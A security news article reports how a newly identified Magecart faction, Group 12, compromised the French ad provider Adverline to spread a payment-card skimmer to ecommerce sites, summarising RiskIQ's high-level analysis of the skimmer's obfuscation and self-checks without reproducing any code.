A new faction of the infamous Magecart cybercrime group was able to compromise a French online advertising provider and install a script that was then propagated to ecommerce sites that loaded code from the ad provider, an attack that could be a sign of things to come with other attack groups.
The compromise of Adverline took place at the end of December and was the work of a team that researchers from RiskIQ are calling Magecart Group 12, a group that hasn’t been documented before. Magecart is an amorphous and loosely connected network of groups that use a variety of techniques to inject a web skimmer into ecommerce and other sites in order to steal payment card information. Magecart has been in operation for at least four years and has been tied to a number of major breaches, including one at Ticketmaster UK. There are several individual groups that fall under the Magecart umbrella, and they generally have different modes of operation and targets.
“At the time of our research, the websites embedded with Adverline’s retargeting script loaded Magecart Group 12’s skimming code, which, in turn, skims payment information entered on webpages then sends it to its remote server.”
This is a much more efficient tactic for Magecart than going after each shopping cart site individually. By targeting a third party that provides resources to a wide customer base, the attackers greatly increase their potential financial rewards. Other Magecart groups have employed a similar technique in the past, targeting third-party library providers who supply plug-ins for ecommerce sites. Group 12 has put together a comprehensive attack infrastructure that allows it to deliver its malicious code directly.
“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis."
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” Yonathan Klijnsma, head of threat research at RiskIQ, who has been following Magecart for several years, wrote in a post on the new compromise.
“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”
The skimmer that Group 12 used in the compromise of Adverline performed a variety of checks after installation, looking to see if it was on a checkout page, if certain words are present in the URL, and whether the code is on a mobile device. All of this is designed to ensure that the skimmer is in the correct place and has a chance to do its job. If the script detects that it’s on a good site, it will execute the skimmer.
The Trend Micro team, who discovered the Adverline compromise, informed the company of the attack and Adverline was able to address the issue. The command-and-control domains involved in the attack are no longer functioning.